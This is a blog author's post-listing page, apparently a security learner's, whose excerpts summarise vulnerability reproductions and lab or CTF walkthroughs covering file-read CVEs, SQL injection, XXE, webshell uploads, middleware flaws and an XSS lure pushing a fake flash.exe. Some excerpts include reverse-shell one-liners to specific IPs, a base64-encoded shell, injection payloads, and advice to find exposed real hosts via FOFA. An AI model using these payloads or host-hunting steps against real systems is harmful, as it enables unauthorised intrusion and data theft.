自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(40)
  • 收藏
  • 关注

原创 用友NC UFIDA任意文件读取

存在任意文件读取漏洞,未授权攻击者可以利用其读取f服务器、网站配置文件等敏感信息。1.fofa:app="用友-UFIDA-NC"在fofa中搜索存在漏洞的网址。3.访问网址,找网址关键信息。

2025-03-30 12:00:30 217

原创 CVE-2025-30208(文件读取)漏洞复现

漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数(**如?import&raw?**)时,Vite对URL尾部分隔符(如?和&)的正则匹配不严格,导致安全检查被绕过。中存在的一个高危逻辑漏洞,允许攻击者通过构造特殊的URL绕过文件访问限制,读取服务器上的任意文件(如配置文件、密钥、数据库凭据等)。CVE-2025-30208是。2.在fofa搜索,寻找存在漏洞ip。3.尝试传参,得到相关信息。

2025-03-30 11:19:34 490

原创 视频管理平台-信息泄露漏洞

EasyCVR 部分版本存在用户信息泄露漏洞,攻击者可直接通过此漏洞获取所有用户的账号密码。在fofa中寻找有漏洞的url。我们可以查看到用户的一些信息。

2025-03-27 20:16:19 133

原创 FALL靶机渗透过程

9.我们使用文件包含把qiu的ssh密钥下载到本地并查看。我们发现了一个test.php文件,有点像有问题的文件。10.我们需要600的权限才能使用密钥文件。7.我们使用file传参查看一下用户信息。8.我们尝试查看qiu的ssh密钥。1.在kali中扫描靶机ip。2.在kali中扫描靶机端口。3.我们尝试分析80端口信息。说明我们在该页面可以传参。6.我们尝试爆破一下参数。

2025-03-27 20:11:33 371

原创 目录遍历漏洞复现

1.在fofa中输入语法,查询目录遍历。3.我们可以app目录中下载文件等等。4.我们还可以访问其他目录的一些东西。

2025-03-25 21:26:54 244

原创 Thales靶机渗透攻略

哥斯拉中执行反弹shell代码 /bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102/8888 0>&1'9.首先我们使用哥斯拉生成一个jsp木马并保存到1.jsp,然后将1.jsp文件压缩为123.zip,修改后缀为war文件,上传。1.我们将靶机导入virtualbox,将连接方式切换为仅主机(host-only)2.在kali虚拟机中将网卡设置为桥接模式,桥接至我们的virtualbox。这里我们扫描到了登录信息,并进行登录。4.在kali中扫描端口。

2025-03-25 19:47:19 200

原创 常见框架漏洞—struts2

1.搭建网站访问网页 /struts2-showcase/

2025-03-24 21:43:56 257

原创 常见框架漏洞—Spring

3.对当前页面进行抓包,修改提交方式为PATCH,内容类型为application/json-patch+json。Spring Data Rest 远程命令执⾏命令。2.访问网站下的/customers/1。4.发现容器目录中有了succese。2.访问网站下的users目录。4.查看终端,发现成功写入。

2025-03-24 21:43:34 314

原创 常见框架漏洞—Shiro

6.我们在云服务器新建一个1.txt,里面写入反弹shell的代码。4.使用工具连接,输入url并爆破密钥。值,说明该系统使⽤了Shiro框架。看响应包 header中返回。2.访问网页登录并进行抓包。5.在命令执行框中输入命令。我们访问后发现成功监听!我们输入反弹shell。

2025-03-24 21:43:18 223

原创 常见框架漏洞—中间件IIS

Windows server 2003中可以看到我们上传的shell.asp。1.启动Windows server 2012,并开启iis。1.在Windows server 2003中搭建网站。6.我们在网站中访问一下shell.asp。7.复制其绝对路径,到蚂蚁的剑中进行连接。3.修改提交方式为PUT,然后写入木马。2.访问网站,并对该网站进行抓包。4.修改提交方式为MOVE,令将其更名为脚本⽂档后缀。二.IIS7文件解析漏洞。返回 416 存在此漏洞。2.访问网站并进行抓包。

2025-03-24 21:42:59 153

原创 常见框架漏洞—Thinkphp

另一个漏洞我们在getshell中输入一句话木马,然后getshell,给我们生成了一个文件并上传到了文件,然后我们尝试访问。3.复制网站url到蓝鲸去测试漏洞。4.访问成功,然后我们传参。2.访问我们搭建的环境。其中一个得到了一些信息。可以执行我们的系统命令。

2025-03-24 21:42:36 262

原创 jangow-01-1.0.1靶机攻略

然后输入wq点击回车退出,然后重启靶机。6.进入如下页面,经过探索之后,点击buscar,发现页面的url可以传参。.ro 替换为 rw signie init=/bin/bash。1.进行配置,按住shift,在图一界面按e进去得到图二。ctrl+x,ip a查看网卡信息,修改配置文件网卡信息。8.我们访问当前目录下的1.php,发现上传成功。9.复制1.php文件的绝对路径,去蚁剑尝试连接。11.在蚂蚁剑中打开终端,输入反弹shell。5.访问靶机ip,点击site。12.成功在kali中监听!

2025-03-24 21:13:29 356

原创 中间件漏洞—Apache

1.搭建服务访问网站2.使⽤poc3.我们使用⼯具验证验证成功!

2025-03-23 17:57:27 216

原创 中间件漏洞—Jboss

该漏洞出现在/invoker/readonly中 ,服务器将⽤户post请求内容进⾏反序列化。该文件为存有木马的jsp文件压缩为zip文件后更改war后缀所得。四.Administration Console弱⼝令。返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞。搭建远程部署 , 部署远程war包地址。3.在目录中可以看到我们上传的文件。三.CVE-2017-12149。填写远程war包地址进行远程部署。一.CVE-2015-7501。二.CVE-2017-7504。上传后门 shell.war。

2025-03-23 17:56:54 1125

原创 中间件漏洞-WebLogic篇

可以利⽤第⼆个漏洞(CVE-2020-14883),远程加载XML⽂件拿到Shell。进⼊ config.do ⽂件进⾏设置,将⽬录设置为 ws_utc 应⽤的静态⽂件css⽬录,访问这个⽬。2.war文件为存有jsp木马的jsp文件压缩为zip然后修改后缀名所得。3.对网站当前页面进行抓包,修改请求包内容类型text/xml。10.复制木马文件的绝对路径到哥斯拉中尝试连接。8.复制木马文件的绝对路径,使用哥斯拉连接。2.将存有木马的2.txt文件存在目录中。6.上传后发现目录中存在我们上传的文件。

2025-03-23 17:55:53 1135

原创 中间件漏洞-Tomcat篇

4.将我们存有jsp木马的2.jsp文件压缩为zip文件然后修改后缀名为war文件。对当前页面进行抓包,修改提交方式为PUT并复制木马。3.在哥斯拉中生成jsp木马并保存为2.jpg。4.在网页中访问我们生成的木马,发现可以访问到。5.复制木马绝对路径,到哥斯拉中测试连接。5.我们在目录中可以看到我们上传的文件。默认密码:tomcat/tomcat。6.现在我们访问一下我们的jsp文件。访问成功,尝试连接webshell。2.在kali中输入命令进行连接。后台弱⼝令部署war包。3.使用弱口令登录进入。

2025-03-23 17:53:55 245

原创 Web-Machine-N7靶机攻略

发现将cookie的role值经过两次url解码👉一次base64解码👉一次MD5解码。8.现在我们访问admin.php并抓包,将role值改变为admin。1.将kali和Vbox都设置成桥接模式,扫描靶机ip。5.现在我们访问/enter_network目录。9.最后的结果为:FLAG{N7KSA_01}在网址后面输入/admin.php看一下。然后放行.............上传之后我们发现了flag的一半。现在我们随便上传一个txt文件。会得到role为admin。发现是一个提交文件的页面。

2025-03-20 20:38:24 313

原创 CMS漏洞-WordPress篇

页面需要上传一个模板zip文件,所以我们随便下载一个zip模板文件。4.显示上传后,访问47.108.120.249:8083。我们发现上传的php代码成功执行,说明上传木马成功!出现phpinfo界面,说明植入的php语句生效。2.在zip模板文件中上传一个1.php文件。1.我们可以上传一个zip文件来植入木马。如果发现不能开启,可以检查版本和端口。后台修改模板拿WebShell。外观 👉编辑 👉404.php。上传主题拿WebShell。3.然后我们上传zip文件。

2025-03-20 19:30:11 394

原创 CMS漏洞-DeDeCMS篇

👉更新主机html,主页位置修改为index.php,生成静态,更新主页html。4.访问网站根目录下的1.php,发现代码成功执行,说明我们的木马上传成功!3.我们在网站根目录下发现了webshell.php文件,内容为一句话木马。4.访问主页,发现主页为phpinfo界面,说明我们植入的代码有效!1.模板👉默认模板管理👉index.htm👉修改。上传一句话木马到webshell.php文件。2.上传成功后查看代码,并复制引号内容。4.我们访问木马文件并复制其绝对路径。2.模块👉文件管理器👉文

2025-03-20 19:28:56 448

原创 matrix-breakout-2-morpheus靶机攻略

出现了这个页面,代码成功执行,说明我们的一句话木马成功上传至test.php。7.暂时没有得到我们需要的信息,可能是dirsearch查找的库不够大,因此我们换一个扫描器来扫描目录看看......访问文件,发现我们输入的信息被上传到了指定的文件中,所以我们可以确定上传的信息和文件都是可控的.......11.如今我们知道了上传的参数是可控的,所有我们现在需要确定上传的文件位置是否是可控的。10.对提交页面进行抓包,我们发现提交的内容被上传到了graffiti.txt文件中。2.访问扫描到的ip并访问。

2025-03-19 18:28:09 596

原创 Billu_b0x靶机攻略

1.启动Billu_b0x虚拟机,将虚机网络设置为net模式,在kali虚拟机中使用arp-scan -l扫描靶机ip。5.add.php页面是一个上传文件的页面,查看其页面源代码并没有发现可用信息。通过传参的方式得到对应的文件内容。7.phpmyadmin的默认的配置文件是:config.inc.php。这里可以先尝试一下get传参,发现失败,那再尝试一下post传参。通过URL猜测路径默认在/var/www/phpmy下面。8.登录到管理后台,发现了数据库的账号密码。10.上传一个png文件。

2025-03-18 20:58:57 305

原创 joker靶机攻略

11.现将原包发送至Intruder---被加密的帐号密码处添加payload。9.查看前100行,并将其复制出来放到桌面文件中,后面进行爆破。暗示用kali里面的rockyou字典的前100个进行密码爆破。1.在kali中使用arp-scan-l扫描靶机ip。使用bp抓包进行爆破,账号密码进行了加密。12.爆破成功,得到账号密码,并进行解码。7.访问secret.txt目录。17.尝试后台getshell。3.nmap扫描端口信息。5.使用dirb扫描。14.使用弱密码登录。16.使用弱密码登录。

2025-03-18 20:58:18 236

原创 log4j2漏洞-反弹shell攻略详解

base64编码后为:YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDguMTUwLjI0OS82NjY2IDA+JjE=4.反弹shell为:bash -i >& /dev/tcp/47.108.150.249/6666 0>&1。3.在DNSLog平台上获取域名来测试一下注入效果。使用 yum install nc安装。1.使用以下命令开启docker。生成了恶意代码类,选择1.8的。7.开启监听成功并成功监听。

2025-03-15 17:27:55 162

原创 hackme靶机攻略

12.通过命令sqlmap -r 1.txt -D webapphacking --dump –batch查询数据。11.通过命令sqlmap -r 1.txt --current-db –batch查询库名。8.搜索框输入Windows OS' and 1=2#,通过布尔判断说明存在sql注入。10.将抓包信息保存到一个文件中,并在OS后加个*,说明在此处进行注入。6.进入后发现有搜索框,我们可以试一下sql注入。16.访问木马文件成功,说明木马写入成功。5.返回到登录界面,注册一个账号并登录。

2025-03-13 20:28:22 118

原创 文件解析漏洞靶场攻略

6.在结尾添加/.php,发现文件中的php代码成功执行。4.在jpg后面加空格空格.php,hex中改20为00。5.在jpg后面添加/.php访问,发现木马执行成功。5.在网页中访问1.jpg文件,发现可以访问成功。1.在根目录下新建一个1.asp;看到1.txt中的文件被当作asp文件执行。1.在根目录下新建一个1.asp的文件夹。4.在对应的www目录下新建一个jpg文件。4.访问evil.php%0a访问木马文件。2.发现txt文件被当作asp文件执行。2.新建一个1.jpg,写入一句话木马。

2025-03-13 19:08:31 260

原创 Tomato靶机通关攻略

13.再次访问日志文件,发现日志文件已写入一句话木马,说明我们的木马脚本成功植入。8.查看页面源代码,发现页面使用image传参且为get模式。1.使用arp-scan -l扫描靶机ip。3.使用dirb在kali中扫描靶机目录。11.使用MobaXterm远程连接ssh。4.进入目录antibot_image/14.现在我们使用菜刀连接,并连接成功。12.连接成功后随便输入密码。5.进入antibots。7.访问info.php。10. 尝试访问日志文件。

2025-03-12 19:27:28 117

原创 upload-labs-master 通关攻略(1-19)

2.对此页面进行抓包,将文件名改为1.jpg,在upload/后添加55.php%00,并对%00进行url解码。2.对此页面进行抓包,将文件名改为1.jpg,在upload/后添加55.php%00。2.对此页面进行抓包,在1.php后加::$DATA绕过。2.对此页面进行抓包,在1.php后加.空格.绕过。2.对此页面进行抓包,在1.php后加空格绕过。2.对此页面进行抓包,在1.php后加点绕过。

2025-03-11 20:35:31 918

原创 xxe-lab 通关攻略

ENTITY xxe SYSTEM "file:///d:/1.txt" > ]>,在usersname处&test;2.随便输入账号密码使用bp抓包,确认回显位置为username。4.在页面渲染中得到1.txt的信息。

2025-03-10 19:52:54 201

原创 XXE靶机通关攻略

ENTITY xxe SYSTEM "php://filter/convert.base64-ncode/resource=xxe.php" > ]>页面渲染显示回显位为admin。14.访问根目录下的/xxe/admin.php,利用得到的账号密码登录。10.读取admin.php文件,如下所示,得到base64编码。24.在网页访问新建的php文件,最后得到flag。2.尝试访问Ip,得到首页,说明靶机地址正确。22.进行解码,得到一堆信息,应该为php。13.对密码进行md5解码,得到密码。

2025-03-10 19:52:29 240

原创 利用xss进行flash攻击钓鱼

3.将pika的管理员作为被攻击者,在输入框中输入<script src="http://192.168.1.11/1.js"></script>,并提交。5.修改1.js中控制下载文件的文件名,修改为flash.exe使得管理员相信下载文件为官方flash文件。4.在管理员界面会出现如下弹窗,提示管理员下载我们制造好的flash。2.将代码粘贴到js文件中并放到数据库根目录下。6.在根目录下创建flash.exe文件。7.现在我们到kali虚拟机中制造病毒。9.管理员下载了我们所制造的病毒。

2025-03-09 21:07:42 174

原创 CTFHub-web-ssrf篇通关攻略

(8).将二次编码后的数据复制到如下界面,并将gopher之后和80之前的'%253A'替换为':',然后访问,出现如下页面,得到flag。(8).并将gopher之后和80之前的'%253A'替换为':',然后访问,出现如下页面,得到flag。(3).得到正确端口为,访问?(1).访问http://127.0.0.1/flag.php,出现如下界面。(1).访问http://127.0.0.1/flag.php,出现如下界面。(2)输入http://localhost/flag.php得到flag。

2025-03-09 18:37:34 648

原创 metinfo csrf漏洞模拟过程

9.右键→相关工具→生成CSRF Poc存到数据库根目录下的test.html文件中。8.我们还可以直接修改管理员的密码。对修改密码界面抓包。5.存到数据库根目录下的test.html文件中。6.现在我们模拟攻击,且管理员处于登录状态。3.进入添加用户界面,输入相关信息,抓包。4.右键→相关工具→生成CSRF Poc。,发现原来的密码错误,证明攻击成功。1.搭建metinfo平台。10.现在我们模拟攻击,2.创建账户并登录。7.管理员创建成功。

2025-03-06 20:48:51 155

原创 sqli-labs靶场(16-20)

5.查询数据,判断语句为1' and updatexml(1,concat('#',(select * from (select group_concat(concat_ws('#',id,username,password)) from users) a)),0) #6.输入1' and updatexml(1,concat(1,(select concat_ws(':',username,password) from users limit 0,1)),1) and'查询数据。

2025-03-04 23:15:54 416

原创 ctf4靶机攻略

page=blog&title=Blog&id=2" -D ehks -T user -C user_name,user_pass --dump,数据如下图。8.ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc dstevens@192.168.124.150连接成功。输入&id and 1=2,页面报错,说明存在sql注入,且为数字型注入。/conf/目录如下。

2025-03-04 20:49:13 290

原创 ai-web 1.0通关攻略

5.在命令框输入-1' union select 1,2,'<?>' into outfile "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/11.php" #注入木马,获得webshell。1.在kali虚拟机中使用dirb命令扫描发现有三个文件,一一去访问。2.访问orbots.txt中的目录得到了一个提交框。3.输入1‘#页面显示正常,说明存在sql注入。

2025-03-03 22:46:53 275

原创 sqli-labs 13-15

输入1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>1,sleep(2),1)#判断其表中第一个字段的第一个字符。4.输入1' and if(ascii(substr(database(),1,1))>115,sleep(2),1)#,判断第一个字符为s.

2025-03-03 21:39:55 553

原创 sqli-labs通关攻略

id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,1))>1,sleep(2),1)--+判断其表中第二个字段的第一个字符。id=1' and if(ascii(substr(database(),1,1))>115,sleep(2),1)--+,判断第一个字符为s.

2025-03-02 21:22:37 629

原创 sqli-labs通关攻略(5-8)

limit 0,1查询第一条数据limit 1,1查询第二条数据limit 2,1查询第三条数据limit 3,1查询第四条数据。

2025-02-27 20:37:42 960 1

原创 sqli-labs通关攻略(1-4)

1.首先判断注入类型是字符型还是数字型。逻辑判断改成错的,页面仍然正常,说明不是数字型的注入。7.得到表名之后,由于所有字段名存在columns表下,所以得到users表下的所有字段。2.尝试加入简单的字符,将逻辑判断改成错的,页面不正常,说明是字符型注入。2.将错误的逻辑判断写入,页面显示出错,因此为数字型注入。3.闭合成功后,重复第一关步骤得到相关信息。3.闭合成功,重复第一关步骤,得到相关信息。3.输入单引号闭合,页面显示正常。2.输入简单的字符,对其进行闭合。1.判断其注入类型为字符型注入。

2025-02-26 23:10:23 298 1

原创 ctfhub-web信息泄露通过攻略

直接在网址中index.php后面加上.bak后缀,即访问“题目网址/index.php.bak” ,而后会自动下载一个index.php.bak文件,这是index.php的备份文件。在网址后面加上/.DS_Store,即访问“题目网址/.DS_Store” ,会下载一个.DS_Store文件,它是Mac OS保存文件夹自定义属性的隐藏文件,通过它可以获取目录里所有文件的清单。在遍历过程中,仔细查看每个文件和文件夹的名称,注意是否有“flag.txt”这样的文件。通过尝试相关网址+文件名进行访问获得。

2025-02-25 23:01:36 325 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除